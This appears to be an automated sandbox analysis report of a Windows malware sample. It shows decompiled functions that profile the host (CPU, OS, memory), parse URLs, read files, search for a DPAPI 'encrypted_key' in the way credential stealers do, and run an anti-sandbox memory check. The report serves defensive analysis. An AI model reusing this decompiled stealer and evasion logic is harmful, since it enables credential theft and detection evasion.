StrStrA.SHLWAPI(00000000,encrypted_key,?,?,C21D6F0A,?,00000000,?,0043EEE8,000000FF,?,0040AF01,?,?,?,00000000), ref: 00419A42
_strlen.LIBCMT ref: 00419A63
_strlen.LIBCMT ref: 00419A7D

Part of subcall function 0040A2A0: _memcmp.LIBCMT ref: 0040A2FA

_memcmp.LIBCMT ref: 00419AD6

Part of subcall function 00404410: std::_Xinvalid_argument.LIBCPMT ref: 00404426
Part of subcall function 00404410: _memmove.LIBCMT ref: 0040445F

Strings

DPAPI, xrefs: 00419AD0
encrypted_key, xrefs: 00419A3C
, xrefs: 00419B01

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: FileLocal$Alloc_memcmp_strlen$CloseCreateFreeHandleReadSizeXinvalid_argument_memmovestd::_
String ID: $DPAPI$encrypted_key
API String ID: 3507041221-454896251
Opcode ID: 60b2baf1913020086af43b4cb0c0c7fa5590cec234b394317be27f511bac8afa
Instruction ID: 79ff869d22225667224e4adaf88010b3094f1b3e66ddf2fdaaf72e944de32445
Opcode Fuzzy Hash: 60b2baf1913020086af43b4cb0c0c7fa5590cec234b394317be27f511bac8afa
Instruction Fuzzy Hash: 824184B1D00218ABDB04DBA5EC91EEE7378FB45314F54462EF81563381E7396D44CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041E930 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 48
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0041E930(void* __ebx, void* __edi, void* __esi) {
				signed int _v8;
				char _v263;
				char _v264;
				char _v520;
				void* _v524;
				int _v528;
				signed int _t14;
				long _t18;
				void* _t26;
				void* _t34;
				void* _t35;
				signed int _t36;

				_t35 = __esi;
				_t34 = __edi;
				_t26 = __ebx;
				_t14 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t14 ^ _t36;
				_v528 = 0xff;
				_v264 = 0;
				E0042A2F0( &_v263, 0, 0xfe);
				_t18 = RegOpenKeyExA(0x80000002, "HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", 0, 0x20119,  &_v524); // executed
				if(_t18 == 0) {
					RegQueryValueExA(_v524, "ProcessorNameString", 0, 0,  &_v264,  &_v528); // executed
				}
				RegCloseKey(_v524);
				CharToOemA( &_v264,  &_v520);
				return E0042A36A( &_v520, _t26, _v8 ^ _t36, _v524, _t34, _t35);
			}

0x0041e930
0x0041e930
0x0041e930
0x0041e939
0x0041e940
0x0041e951
0x0041e95b
0x0041e962
0x0041e982
0x0041e98a
0x0041e9aa
0x0041e9aa
0x0041e9b7
0x0041e9cb
0x0041e9e4

APIs

_memset.LIBCMT ref: 0041E962
RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020119,?), ref: 0041E982
RegQueryValueExA.KERNEL32(?,ProcessorNameString,00000000,00000000,00000000,000000FF), ref: 0041E9AA
RegCloseKey.ADVAPI32(?), ref: 0041E9B7
CharToOemA.USER32(00000000,?), ref: 0041E9CB

Strings

HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 0041E978
ProcessorNameString, xrefs: 0041E9A4

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: CharCloseOpenQueryValue_memset
String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString
API String ID: 2235053359-2804670039
Opcode ID: bce8888f15a6852a13cebf15168bbdf87854dcd16304851276f0f7da25e82c15
Instruction ID: 161bfa8dd623e742d937befb30b0cafe49d38822dfe866007600ba8acccf7e4d
Opcode Fuzzy Hash: bce8888f15a6852a13cebf15168bbdf87854dcd16304851276f0f7da25e82c15
Instruction Fuzzy Hash: AD11CCB560031CAFDB20DF50DC49FDA7378EB54704F1041E9E619A61D1EBB46A848F59

Uniqueness

Uniqueness Score: -1.00%

Function 0041ECD0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 48
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0041ECD0(void* __ebx, void* __edi, void* __esi) {
				signed int _v8;
				char _v263;
				char _v264;
				char _v520;
				void* _v524;
				int _v528;
				signed int _t14;
				long _t18;
				void* _t26;
				void* _t34;
				void* _t35;
				signed int _t36;

				_t35 = __esi;
				_t34 = __edi;
				_t26 = __ebx;
				_t14 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t14 ^ _t36;
				_v528 = 0xff;
				_v264 = 0;
				E0042A2F0( &_v263, 0, 0xfe);
				_t18 = RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", 0, 0x20119,  &_v524); // executed
				if(_t18 == 0) {
					RegQueryValueExA(_v524, "ProductName", 0, 0,  &_v264,  &_v528); // executed
				}
				RegCloseKey(_v524);
				CharToOemA( &_v264,  &_v520);
				return E0042A36A( &_v520, _t26, _v8 ^ _t36, _v524, _t34, _t35);
			}

0x0041ecd0
0x0041ecd0
0x0041ecd0
0x0041ecd9
0x0041ece0
0x0041ecf1
0x0041ecfb
0x0041ed02
0x0041ed22
0x0041ed2a
0x0041ed4a
0x0041ed4a
0x0041ed57
0x0041ed6b
0x0041ed84

APIs

_memset.LIBCMT ref: 0041ED02
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?), ref: 0041ED22
RegQueryValueExA.KERNEL32(?,ProductName,00000000,00000000,00000000,000000FF), ref: 0041ED4A
RegCloseKey.ADVAPI32(?), ref: 0041ED57
CharToOemA.USER32(00000000,?), ref: 0041ED6B

Strings

SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0041ED18
ProductName, xrefs: 0041ED44

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: CharCloseOpenQueryValue_memset
String ID: ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 2235053359-1787575317
Opcode ID: b295e3dae4a3f1677ac452af553fe521ba68ceb23fc21aebc6d6eff8b34f1888
Instruction ID: df06a111cc7711cedcfe90cdc3364cca9d2286229a2b72e74f887fcdf9a441ef
Opcode Fuzzy Hash: b295e3dae4a3f1677ac452af553fe521ba68ceb23fc21aebc6d6eff8b34f1888
Instruction Fuzzy Hash: 1C110CB560031CABDB20DF50DC49FD97378EB54704F1041E9E619A6191E7B46A848F55

Uniqueness

Uniqueness Score: -1.00%

Function 0041EBE0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 46
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041EBE0(void* __ebx, void* __edi) {
				signed int _v8;
				struct _MEMORYSTATUSEX _v72;
				void* __esi;
				signed int _t12;
				void* _t17;
				unsigned int _t18;
				unsigned int _t22;
				void* _t23;
				signed int _t25;
				void* _t29;
				void* _t30;
				CHAR* _t31;
				signed int _t32;

				_t30 = __edi;
				_t23 = __ebx;
				_t12 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t12 ^ _t32;
				_t31 = HeapAlloc(GetProcessHeap(), 0, 0x104);
				_t17 = E0042A2F0( &_v72, 0, 0x40);
				_v72.dwLength = 0x40;
				GlobalMemoryStatusEx( &_v72); // executed
				if(_t17 != 1) {
					_t25 = 0;
					_t18 = 0;
				} else {
					_t22 = _v72.ullAvailPhys;
					_t25 = (_t22 << 0x00000020 | _v72.ullTotalPhys) >> 0x14;
					_t18 = _t22 >> 0x14;
				}
				wsprintfA(_t31, "%d MB", _t25);
				return E0042A36A(_t31, _t23, _v8 ^ _t32, _t29, _t30, _t31, _t18);
			}

0x0041ebe0
0x0041ebe0
0x0041ebe6
0x0041ebed
0x0041ec07
0x0041ec0f
0x0041ec1b
0x0041ec22
0x0041ec2b
0x0041ec3c
0x0041ec3e
0x0041ec2d
0x0041ec2d
0x0041ec33
0x0041ec37
0x0041ec37
0x0041ec48
0x0041ec61

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000010), ref: 0041EBF8
HeapAlloc.KERNEL32(00000000), ref: 0041EBFF
_memset.LIBCMT ref: 0041EC0F
GlobalMemoryStatusEx.KERNEL32(?), ref: 0041EC22
wsprintfA.USER32 ref: 0041EC48

Strings

%d MB, xrefs: 0041EC42
@, xrefs: 0041EC1B

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Heap$AllocGlobalMemoryProcessStatus_memsetwsprintf
String ID: %d MB$@
API String ID: 3402858368-3474575989
Opcode ID: c30d2b155b7c7e38f96f34bc40573b80781d714194c646a2743a004fa64c15e9
Instruction ID: 246f83f8042c11a2901da0b75e5d81493707dd2e075adaf5b4159a81d91bb195
Opcode Fuzzy Hash: c30d2b155b7c7e38f96f34bc40573b80781d714194c646a2743a004fa64c15e9
Instruction Fuzzy Hash: 8A01D0B1A00208ABDB04DFA4DD0AFAE77B4DB00704F400129FD06D7280FAB49D01879E

Uniqueness

Uniqueness Score: -1.00%

Function 004140E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 42
stringnetworkCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E004140E0(void* __ebx, void* __edi, char* _a4) {
				signed int _v8;
				char _v72;
				intOrPtr _v124;
				char* _v128;
				char _v132;
				void* __esi;
				signed int _t12;
				int _t19;
				char* _t20;
				void* _t22;
				void* _t27;
				void* _t28;
				void* _t30;
				signed int _t31;

				_t27 = __edi;
				_t22 = __ebx;
				_t12 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t12 ^ _t31;
				E0042A2F0( &_v72, 0, 0x40);
				E0042A2F0( &_v132, 0, 0x3c);
				_t26 =  &_v72;
				_v132 = 0x3c;
				_v128 =  &_v72;
				_v124 = 0x40;
				_t19 = InternetCrackUrlA(_a4,  *0x464758( &_v132, _t28), _a4, 0x10000000); // executed
				_t20 = _v128;
				_pop(_t30);
				if(_t19 == 0) {
					_t20 = "http";
				}
				return E0042A36A(_t20, _t22, _v8 ^ _t31, _t26, _t27, _t30);
			}

0x004140e0
0x004140e0
0x004140e9
0x004140f0
0x004140ff
0x0041410c
0x0041411d
0x00414121
0x00414128
0x0041412b
0x0041413a
0x00414142
0x00414145
0x00414146
0x00414148
0x00414148
0x0041415a

APIs

_memset.LIBCMT ref: 004140FF
_memset.LIBCMT ref: 0041410C
lstrlen.KERNEL32(00000000,10000000,?,?,?,?,?,?,00000000), ref: 00414132
InternetCrackUrlA.WININET(00000000,00000000), ref: 0041413A

Strings

http, xrefs: 00414148
@, xrefs: 0041412B
<, xrefs: 00414121

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: _memset$CrackInternetlstrlen
String ID: <$@$http
API String ID: 3332450456-26727890
Opcode ID: 69496379aae93d62e09c1cd0d6e5eb09796b9a840d89280245506f7a6a76eb75
Instruction ID: 0641e36ba8dbce487addd2d0ed187e4263cbccda6496293af77124d517fac0d9
Opcode Fuzzy Hash: 69496379aae93d62e09c1cd0d6e5eb09796b9a840d89280245506f7a6a76eb75
Instruction Fuzzy Hash: 6D014471A00218ABEF10DFA9DC45FDD77BCEF08704F504059FA05E7281EB756A048B99

Uniqueness

Uniqueness Score: -1.00%

Function 0041C160 Relevance: 12.2, APIs: 8, Instructions: 174
stringCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E0041C160(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				char _v16;
				signed int _v20;
				char _v280;
				char _v540;
				intOrPtr _v548;
				char _v552;
				char _v568;
				intOrPtr _v576;
				char _v580;
				short _v596;
				char _v597;
				char _v604;
				char _v608;
				intOrPtr _v612;
				intOrPtr _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t61;
				signed int _t62;
				intOrPtr _t74;
				void* _t76;
				intOrPtr* _t79;
				void* _t80;
				intOrPtr _t84;
				intOrPtr _t85;
				void* _t90;
				void* _t96;
				void* _t98;
				void* _t128;
				void* _t129;
				void* _t130;
				void* _t131;
				intOrPtr _t132;
				void* _t133;
				void* _t135;
				signed int _t136;
				void* _t137;
				void* _t141;

				_t61 =  *0x451f00; // 0xc21d6f0a
				_t62 = _t61 ^ _t136;
				_v20 = _t62;
				 *[fs:0x0] =  &_v16;
				_t132 = _a4;
				_t129 = __ecx;
				_v612 = _a8;
				_v616 = _a12;
				_v604 = 0;
				_v608 = 0;
				E0042A2F0( &_v540, 0, 0x104);
				 *0x464860( &_v540, E00420650(0, _t129, _t132, 0x1c), _t62, _t128, _t131, _t96,  *[fs:0x0], E0043F146, 0xffffffff);
				 *0x464860( &_v540, _t132);
				E0042A2F0( &_v280, 0, 0x104);
				 *0x464860( &_v280,  &_v540);
				 *0x464860( &_v280, "\\");
				_t74 =  *0x453630; // 0x25c61e8
				 *0x464860( &_v280, _t74);
				_v548 = 0xf;
				_v552 = 0;
				_v568 = 0;
				_t76 = E0042BC70( &_v280);
				_t141 = _t137 - 0x258 + 0x20;
				E00404BC0( &_v568,  &_v280, _t76);
				_v8 = 0;
				_t79 = E00423960( &_v597,  &_v596,  &_v568);
				_v8 = 1;
				if( *((intOrPtr*)(_t79 + 0x14)) >= 8) {
					_t79 =  *_t79;
				}
				_t80 = E00420590(_t79); // executed
				_t133 = _t80;
				if(_v576 >= 8) {
					_push(_v596);
					E0042A289();
					_t141 = _t141 + 4;
				}
				_v576 = 7;
				_v580 = 0;
				_v596 = 0;
				_v8 = 0xffffffff;
				if(_v548 >= 0x10) {
					_push(_v568);
					E0042A289();
					_t141 = _t141 + 4;
				}
				_v548 = 0xf;
				_v552 = 0;
				_v568 = 0;
				if(_t133 != 0) {
					_t90 = E004199D0(_t129,  &_v280,  &_v604,  &_v608); // executed
					if(_t90 == 0) {
						E004150C0( &_v604,  &_v608);
					}
				}
				_t134 = _v612;
				_t125 = _v604;
				E0041AFF0(_t129, 0x443c1c,  &_v540, _v612, _v604, _v608,  *((intOrPtr*)(_t129 + 0x20)), _v616, 0); // executed
				if( *((intOrPtr*)(_t129 + 6)) != 0) {
					E00417100(_t129,  &_v540, _t134, 0); // executed
				}
				_t84 = _v604;
				if(_t84 != 0) {
					 *0x4647a4(_t84, 0);
					_v604 = 0;
				}
				_t85 = _v608;
				if(_t85 != 0) {
					_t85 =  *0x464858(_t85);
				}
				 *[fs:0x0] = _v16;
				_pop(_t130);
				_pop(_t135);
				_pop(_t98);
				return E0042A36A(_t85, _t98, _v20 ^ _t136, _t125, _t130, _t135);
			}

0x0041c177
0x0041c17c
0x0041c17e
0x0041c188
0x0041c191
0x0041c19b
0x0041c1a8
0x0041c1ae
0x0041c1b4
0x0041c1ba
0x0041c1c0
0x0041c1d7
0x0041c1e5
0x0041c1f8
0x0041c20e
0x0041c220
0x0041c226
0x0041c233
0x0041c240
0x0041c24a
0x0041c250
0x0041c256
0x0041c25b
0x0041c26c
0x0041c285
0x0041c288
0x0041c291
0x0041c295
0x0041c297
0x0041c297
0x0041c2a0
0x0041c2ac
0x0041c2ae
0x0041c2b6
0x0041c2b7
0x0041c2bc
0x0041c2bc
0x0041c2c8
0x0041c2d2
0x0041c2d8
0x0041c2df
0x0041c2e6
0x0041c2ee
0x0041c2ef
0x0041c2f4
0x0041c2f4
0x0041c2f7
0x0041c301
0x0041c307
0x0041c30f
0x0041c326
0x0041c330
0x0041c340
0x0041c345
0x0041c330
0x0041c357
0x0041c35f
0x0041c377
0x0041c37f
0x0041c38c
0x0041c38c
0x0041c391
0x0041c399
0x0041c39d
0x0041c3a3
0x0041c3a3
0x0041c3a9
0x0041c3b1
0x0041c3b4
0x0041c3b4
0x0041c3bd
0x0041c3c5
0x0041c3c6
0x0041c3c7
0x0041c3d5

APIs

_memset.LIBCMT ref: 0041C1C0

Part of subcall function 00420650: _memset.LIBCMT ref: 00420671
Part of subcall function 00420650: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 0042068A

lstrcat.KERNEL32(?,00000000), ref: 0041C1D7
lstrcat.KERNEL32(?,025C6320), ref: 0041C1E5
_memset.LIBCMT ref: 0041C1F8
lstrcat.KERNEL32(?,?), ref: 0041C20E
lstrcat.KERNEL32(?,00443C68), ref: 0041C220
lstrcat.KERNEL32(?,025C61E8), ref: 0041C233
_strlen.LIBCMT ref: 0041C256

Part of subcall function 00423960: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,00000000,?,?,0040AE75,?,?,?), ref: 0042398E
Part of subcall function 00423960: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 004239C4
Part of subcall function 00423960: _wcslen.LIBCMT ref: 004239E1

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: lstrcat$_memset$ByteCharMultiWide$FolderPath_strlen_wcslen
String ID:
API String ID: 4087622481-0
Opcode ID: 95dd196ebe897e85e1c82d4db312239e01eb7060d2c0b6a6ba09457a354cf74a
Instruction ID: fa5ea7054d3a84e6fd742a99c7f739c60397dde0b766dae86297b391507326df
Opcode Fuzzy Hash: 95dd196ebe897e85e1c82d4db312239e01eb7060d2c0b6a6ba09457a354cf74a
Instruction Fuzzy Hash: 316143B290025CABCB24EF95DCC9ADEB778EB49305F0045DEE509A3241EB745E84CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00423BF0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 100
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00423BF0(void* __edi, void* __eflags, char* _a4, intOrPtr _a8) {
				char _v8;
				char _v16;
				signed int _v20;
				intOrPtr _v28;
				char _v48;
				char _v52;
				char* _v56;
				char _v64;
				char _v68;
				char* _v72;
				signed int _v116;
				char _v128;
				char _v136;
				char _v140;
				char _v200;
				char _v208;
				char _v212;
				char _v216;
				char _v224;
				void* __ebx;
				void* __esi;
				signed int _t56;
				signed int _t57;
				void* _t66;
				void* _t79;
				void* _t99;
				char* _t101;
				void* _t102;
				signed int _t103;
				void* _t104;
				void* _t105;
				signed int _t109;

				_t99 = __edi;
				_push(0xffffffff);
				_push(E0043FB06);
				_push( *[fs:0x0]);
				_t105 = _t104 - 0xd4;
				_t56 =  *0x451f00; // 0xc21d6f0a
				_t57 = _t56 ^ _t103;
				_v20 = _t57;
				_push(_t57);
				 *[fs:0x0] =  &_v16;
				_t101 = _a4;
				_v52 = 0;
				 *((intOrPtr*)(_t101 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t101 + 0x10)) = 0;
				_v56 = _t101;
				 *_t101 = 0;
				_v224 = 0x446b74;
				_v208 = 0x446b7c;
				_v8 = 1;
				_v52 = 3;
				_v128 = 0x446330;
				_v216 = 0;
				_v212 = 0;
				E00418160( &_v128, __eflags); // executed
				_t17 =  &_v128; // 0x446330
				_v72 =  &_v200;
				_v68 = 0;
				_v64 = E00419190(_t17, __eflags, 0x20);
				if(_v72 == 0) {
					_t109 = _v116 | 0x00000004;
					_t23 =  &_v128; // 0x446330
					E00418030(_t23, _v116 | 0x00000004, 0);
				}
				_t24 =  &_v208; // 0x446b7c
				 *((intOrPtr*)(_t103 +  *((intOrPtr*)( *_t24 + 4)) - 0xcc)) = 0x446ad0;
				_t28 =  &_v224; // 0x446b74
				 *((intOrPtr*)(_t103 +  *((intOrPtr*)( *_t28 + 4)) - 0xdc)) = 0x446ad8;
				_t33 = _v224 + 4; // 0x0
				_v8 = 6;
				 *((intOrPtr*)(_t103 +  *_t33 - 0xdc)) = 0x446b54;
				E00418AD0( &_v200, _t109);
				_v200 = 0x446ae4;
				_v140 = 0;
				_v136 = 0;
				_v8 = 8;
				E00421CF0( &_v208, _a8);
				_t98 =  &_v48;
				_t45 =  &_v224; // 0x446b54
				_t66 = E00423B90(_t45,  &_v48);
				_v8 = 9;
				E00404D00(_t101, _t66);
				if(_v28 >= 0x10) {
					_push(_v48);
					E0042A289();
					_t105 = _t105 + 4;
				}
				_v8 = 0;
				E004211F0(_t99);
				_t51 =  &_v128; // 0x446330
				_v128 = 0x445de4;
				E00429F19(_t51);
				 *[fs:0x0] = _v16;
				_pop(_t102);
				_pop(_t79);
				return E0042A36A(_t101, _t79, _v20 ^ _t103, _t98, _t99, _t102);
			}

0x00423bf0
0x00423bf3
0x00423bf5
0x00423c00
0x00423c01
0x00423c07
0x00423c0c
0x00423c0e
0x00423c13
0x00423c17
0x00423c1d
0x00423c22
0x00423c25
0x00423c2c
0x00423c2f
0x00423c32
0x00423c34
0x00423c3e
0x00423c4b
0x00423c52
0x00423c59
0x00423c60
0x00423c66
0x00423c6c
0x00423c79
0x00423c7c
0x00423c7f
0x00423c87
0x00423c8d
0x00423c92
0x00423c97
0x00423c9a
0x00423c9a
0x00423c9f
0x00423ca8
0x00423cb3
0x00423cbc
0x00423ccd
0x00423cd6
0x00423cdd
0x00423ce8
0x00423ced
0x00423cf7
0x00423cfd
0x00423d0d
0x00423d14
0x00423d19
0x00423d1d
0x00423d23
0x00423d2b
0x00423d2f
0x00423d38
0x00423d3d
0x00423d3e
0x00423d43
0x00423d43
0x00423d49
0x00423d4c
0x00423d51
0x00423d55
0x00423d5c
0x00423d69
0x00423d71
0x00423d72
0x00423d80

APIs

Part of subcall function 00418160: std::locale::_Init.LIBCPMT ref: 004181AA
Part of subcall function 00418160: std::_Lockit::_Lockit.LIBCPMT ref: 004181BD

Part of subcall function 00419190: std::_Lockit::_Lockit.LIBCPMT ref: 004191E6

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00423D5C

Part of subcall function 00418030: __CxxThrowException@8.LIBCMT ref: 00418054
Part of subcall function 00418030: std::exception::exception.LIBCMT ref: 00418078
Part of subcall function 00418030: __CxxThrowException@8.LIBCMT ref: 00418093
Part of subcall function 00418030: std::exception::exception.LIBCMT ref: 004180B2
Part of subcall function 00418030: __CxxThrowException@8.LIBCMT ref: 004180CD
Part of subcall function 00418030: std::exception::exception.LIBCMT ref: 004180E7
Part of subcall function 00418030: __CxxThrowException@8.LIBCMT ref: 00418102

Strings

PMA, xrefs: 00423D55
0cD, xrefs: 00423C79, 00423D46, 00423D51, 00423C97, 00423D54
tkD, xrefs: 00423CB3, 00423D1D
|kD, xrefs: 00423C9F
B, xrefs: 00423CA8

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Exception@8Throw$std::exception::exception$LockitLockit::_std::_$InitIos_base_dtorstd::ios_base::_std::locale::_
String ID: 0cD$PMA$tkD$|kD$B
API String ID: 250614744-2655677997
Opcode ID: 3b293df0a1cb21ca54d63c1611d4ef70e2f5e8994ed2efd1da84df596a270110
Instruction ID: a465ace1d8931779bb2a945deb248a3c3a06ccd303def20354b582bb0d5f8981
Opcode Fuzzy Hash: 3b293df0a1cb21ca54d63c1611d4ef70e2f5e8994ed2efd1da84df596a270110
Instruction Fuzzy Hash: 314117B0D00258DFEB20DF95D984B9DBBB4FB08304F50819EE819A7281DB786A48CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00414F00 Relevance: 9.1, APIs: 6, Instructions: 67
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E00414F00(CHAR* _a4, void** _a8, long* _a12) {
				long _v8;
				intOrPtr _v12;
				long _v16;
				void* _t13;
				long _t17;
				void* _t18;
				signed int _t19;
				void* _t25;
				long* _t34;
				signed int _t37;

				_t37 = 0;
				_t13 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0, 0); // executed
				_t25 = _t13;
				if(_t25 != 0 && _t25 != 0xffffffff) {
					_push( &_v16);
					_push(_t25);
					if( *0x4646ac() != 0 && _v12 == 0) {
						_t17 = _v16;
						_t34 = _a12;
						 *_t34 = _t17; // executed
						_t18 = LocalAlloc(0x40, _t17); // executed
						 *_a8 = _t18;
						if(_t18 != 0) {
							_t19 = ReadFile(_t25, _t18,  *_t34,  &_v8, 0); // executed
							_t37 = _t19 & (0 |  *_t34 == _v8);
							if(_t37 == 0) {
								LocalFree( *_a8);
							}
						}
					}
					CloseHandle(_t25);
				}
				return _t37;
			}

0x00414f0b
0x00414f1a
0x00414f20
0x00414f24
0x00414f2e
0x00414f2f
0x00414f38
0x00414f3f
0x00414f43
0x00414f49
0x00414f4b
0x00414f54
0x00414f58
0x00414f64
0x00414f76
0x00414f78
0x00414f80
0x00414f80
0x00414f78
0x00414f86
0x00414f88
0x00414f88
0x00414f95

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,00000000,C21D6F0A,?,00000000,?,0043EEE8,000000FF), ref: 00414F1A
GetFileSizeEx.KERNEL32(00000000,?,?,0040AF01,?,?,?,00000000,?,?,?,00000000), ref: 00414F30
LocalAlloc.KERNEL32(00000040,?,00000000,?,0040AF01,?,?,?,00000000,?,?,?,00000000), ref: 00414F4B
ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,0040AF01,?,?,?,00000000,?,?,?,00000000), ref: 00414F64
LocalFree.KERNEL32(00000000,?,0040AF01,?,?,?,00000000,?,?,?,00000000,?,?,?,?,C21D6F0A), ref: 00414F80
CloseHandle.KERNEL32(00000000,?,0040AF01,?,?,?,00000000,?,?,?,00000000,?,?,?,?,C21D6F0A), ref: 00414F88

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: 2928ce65cd0ce6e551059fb01343a61ec4be29fcd47f7982b4cd15c53da6740e
Instruction ID: 456b71761e792d225c11a07beee228fcead6c42c366847584227664f1104ab3f
Opcode Fuzzy Hash: 2928ce65cd0ce6e551059fb01343a61ec4be29fcd47f7982b4cd15c53da6740e
Instruction Fuzzy Hash: 93115B75600216ABDB20DFA5DC88EABBBACEB85760B104125F905D7340E6749981CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00401060 Relevance: 9.1, APIs: 6, Instructions: 51
memoryCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E00401060(void* __ecx) {
				void* _t1;
				void* _t2;
				int _t4;
				void* _t11;

				_t1 = GetCurrentProcess();
				__imp__VirtualAllocExNuma(_t1, 0, 0x7d0, 0x3000, 0x40, 0); // executed
				if(_t1 == 0) {
					ExitProcess(__eax);
				}
				_t2 = VirtualAlloc(0, 0x17c841c0, 0x3000, 4); // executed
				_t11 = _t2;
				_push(_t2);
				if(_t2 != 0x11) {
					asm("cld");
				}
				asm("clc");
				_pop(_t4);
				if(_t11 != 0) {
					E0042A2F0(_t11, 0, 0x5e69ec0);
					_push(_t6);
					asm("cld");
					_t4 = VirtualFree(_t11, 0x17c841c0, 0x8000);
				}
				return _t4;
			}

0x00401070
0x00401077
0x0040107f
0x00401082
0x00401082
0x00401010
0x00401016
0x00401018
0x0040101c
0x00401020
0x00401021
0x00401025
0x00401026
0x00401029
0x00401036
0x0040103e
0x00401043
0x00401050
0x00401050
0x00401058

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00401010
_memset.LIBCMT ref: 00401036
VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 00401050
GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,00411120), ref: 00401070
VirtualAllocExNuma.KERNEL32(00000000), ref: 00401077
ExitProcess.KERNEL32 ref: 00401082

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

